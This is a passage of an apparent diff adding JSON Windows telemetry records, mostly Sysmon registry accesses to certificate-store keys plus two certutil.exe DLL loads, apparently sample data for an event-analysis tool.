"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": 
"Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497770000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497770000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "certca.dll", + "image_path": "C:\\Windows\\System32\\certca.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdsapi.dll", + "image_path": "C:\\Windows\\System32\\ntdsapi.dll", + "pid": 904, + "process_name": "certutil.exe", + "process_path": "C:\\Windows\\System32\\certutil.exe", + "timestamp": 131883573496980000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": 
"registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", 
+ "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573497920000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + 
"registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + 
"registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573498080000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 